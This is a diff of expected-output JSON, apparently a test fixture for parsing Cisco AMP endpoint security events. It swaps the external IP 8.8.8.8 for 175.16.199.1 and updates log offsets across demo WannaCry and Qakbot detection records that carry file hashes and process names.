         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1192,7 +1192,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 24800,
+        "log.offset": 24900,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1201,7 +1201,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1213,7 +1213,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1247,7 +1247,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 25986,
+        "log.offset": 26091,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1256,7 +1256,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1268,7 +1268,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1302,7 +1302,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 27172,
+        "log.offset": 27282,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1311,7 +1311,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1323,7 +1323,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1357,7 +1357,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 28358,
+        "log.offset": 28473,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1366,7 +1366,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1378,7 +1378,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1412,7 +1412,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 29544,
+        "log.offset": 29664,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1421,7 +1421,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1433,7 +1433,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1467,7 +1467,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 30737,
+        "log.offset": 30862,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -1476,7 +1476,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1488,7 +1488,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1527,7 +1527,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 31923,
+        "log.offset": 32053,
         "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
         "process.name": "tasksche.exe",
         "process.pid": 2920,
@@ -1539,7 +1539,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1555,7 +1555,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1594,7 +1594,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 33372,
+        "log.offset": 33507,
         "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
         "process.name": "tasksche.exe",
         "process.pid": 2920,
@@ -1606,7 +1606,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1622,7 +1622,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1663,7 +1663,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 34828,
+        "log.offset": 34968,
         "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
         "process.name": "tasksche.exe",
         "process.pid": 2920,
@@ -1677,7 +1677,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1693,7 +1693,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1734,7 +1734,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 36357,
+        "log.offset": 36502,
         "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
         "process.name": "tasksche.exe",
         "process.pid": 2920,
@@ -1748,7 +1748,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -1764,7 +1764,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1796,7 +1796,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 37912,
+        "log.offset": 38062,
         "related.hash": [
             "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
         ],
@@ -1805,7 +1805,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1817,7 +1817,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1849,7 +1849,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 39032,
+        "log.offset": 39187,
         "related.hash": [
             "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"
         ],
@@ -1858,7 +1858,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1870,7 +1870,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1902,7 +1902,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 40152,
+        "log.offset": 40312,
         "related.hash": [
             "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"
         ],
@@ -1911,7 +1911,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1923,7 +1923,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -1955,7 +1955,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 41272,
+        "log.offset": 41437,
         "related.hash": [
             "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"
         ],
@@ -1964,7 +1964,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -1976,7 +1976,7 @@
         "@timestamp": "2021-01-14T19:29:11.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2008,7 +2008,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 42392,
+        "log.offset": 42562,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2017,7 +2017,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2029,7 +2029,7 @@
         "@timestamp": "2021-01-14T19:29:10.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2063,7 +2063,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 43512,
+        "log.offset": 43687,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2072,7 +2072,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2084,7 +2084,7 @@
         "@timestamp": "2021-01-14T19:29:10.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2118,7 +2118,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 44698,
+        "log.offset": 44878,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -2127,7 +2127,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2139,7 +2139,7 @@
         "@timestamp": "2021-01-14T19:29:10.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2173,7 +2173,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 45884,
+        "log.offset": 46069,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -2182,7 +2182,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2194,7 +2194,7 @@
         "@timestamp": "2021-01-14T19:29:10.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2228,7 +2228,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 47070,
+        "log.offset": 47260,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -2237,7 +2237,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2249,7 +2249,7 @@
         "@timestamp": "2021-01-14T19:29:10.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2290,7 +2290,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 48256,
+        "log.offset": 48451,
         "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549",
         "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
         "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
@@ -2306,7 +2306,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2322,7 +2322,7 @@
         "@timestamp": "2021-01-14T19:29:10.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2363,7 +2363,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 49887,
+        "log.offset": 50087,
         "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549",
         "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
         "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
@@ -2379,7 +2379,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2395,7 +2395,7 @@
         "@timestamp": "2021-01-14T19:29:10.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2427,7 +2427,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 51525,
+        "log.offset": 51730,
         "related.hash": [
             "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
         ],
@@ -2436,7 +2436,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2448,7 +2448,7 @@
         "@timestamp": "2021-01-14T19:29:10.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2480,7 +2480,7 @@
         "host.hostname": "Demo_WannaCry_Ransomware",
         "host.name": "Demo_WannaCry_Ransomware",
         "input.type": "log",
-        "log.offset": 52645,
+        "log.offset": 52855,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -2489,7 +2489,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -2501,7 +2501,7 @@
         "@timestamp": "2021-01-14T19:29:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2541,7 +2541,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 53765,
+        "log.offset": 53980,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -2552,7 +2552,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2568,7 +2568,7 @@
         "@timestamp": "2021-01-14T19:29:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2608,7 +2608,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 55136,
+        "log.offset": 55356,
         "related.hash": [
             "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
             "84c82835a5d21bbcf75a61706d8ab549",
@@ -2619,7 +2619,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2635,7 +2635,7 @@
         "@timestamp": "2021-01-14T19:29:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2676,7 +2676,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 56507,
+        "log.offset": 56732,
         "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
         "process.name": "mssecsvc.exe",
         "process.pid": 7144,
@@ -2690,7 +2690,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2706,7 +2706,7 @@
         "@timestamp": "2021-01-14T19:29:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2747,7 +2747,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 58030,
+        "log.offset": 58260,
         "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
         "process.name": "mssecsvc.exe",
         "process.pid": 7144,
@@ -2761,7 +2761,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2777,7 +2777,7 @@
         "@timestamp": "2021-01-14T19:29:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2815,7 +2815,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 59553,
+        "log.offset": 59788,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -2824,7 +2824,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2840,7 +2840,7 @@
         "@timestamp": "2021-01-14T19:29:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2878,7 +2878,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 60814,
+        "log.offset": 61054,
         "related.hash": [
             "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
         ],
@@ -2887,7 +2887,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2903,7 +2903,7 @@
         "@timestamp": "2021-01-14T19:29:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -2944,7 +2944,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 62075,
+        "log.offset": 62320,
         "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
         "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
         "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -2960,7 +2960,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -2976,7 +2976,7 @@
         "@timestamp": "2021-01-14T19:29:09.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3017,7 +3017,7 @@
         "host.os.family": "windows",
         "host.os.platform": "windows",
         "input.type": "log",
-        "log.offset": 63680,
+        "log.offset": 63930,
         "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f",
         "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf",
         "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71",
@@ -3033,7 +3033,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "related.user": [
             "user@testdomain.com"
@@ -3049,7 +3049,7 @@
         "@timestamp": "2021-01-14T19:10:32.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3075,13 +3075,13 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 65285,
+        "log.offset": 65540,
         "related.hosts": [
             "Demo_Qakbot_3"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3093,7 +3093,7 @@
         "@timestamp": "2021-01-14T19:10:31.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3119,13 +3119,13 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 66208,
+        "log.offset": 66468,
         "related.hosts": [
             "Demo_Qakbot_3"
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3137,7 +3137,7 @@
         "@timestamp": "2021-01-14T19:10:30.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
                 "ip": "10.10.10.10",
@@ -3171,7 +3171,7 @@
         "host.hostname": "Demo_Qakbot_3",
         "host.name": "Demo_Qakbot_3",
         "input.type": "log",
-        "log.offset": 67131,
+        "log.offset": 67396,
         "related.hash": [
             "d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"
         ],
@@ -3180,7 +3180,7 @@
         ],
         "related.ip": [
             "10.10.10.10",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "service.type": "cisco",
         "tags": [
@@ -3192,7 +3192,7 @@
         "@timestamp": "2021-01-14T19:10:30.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
-        "cisco.amp.computer.external_ip": "8.8.8.8",
+        "cisco.amp.computer.external_ip": "175.16.199.1",
         "cisco.amp.computer.network_addresses": [
             {
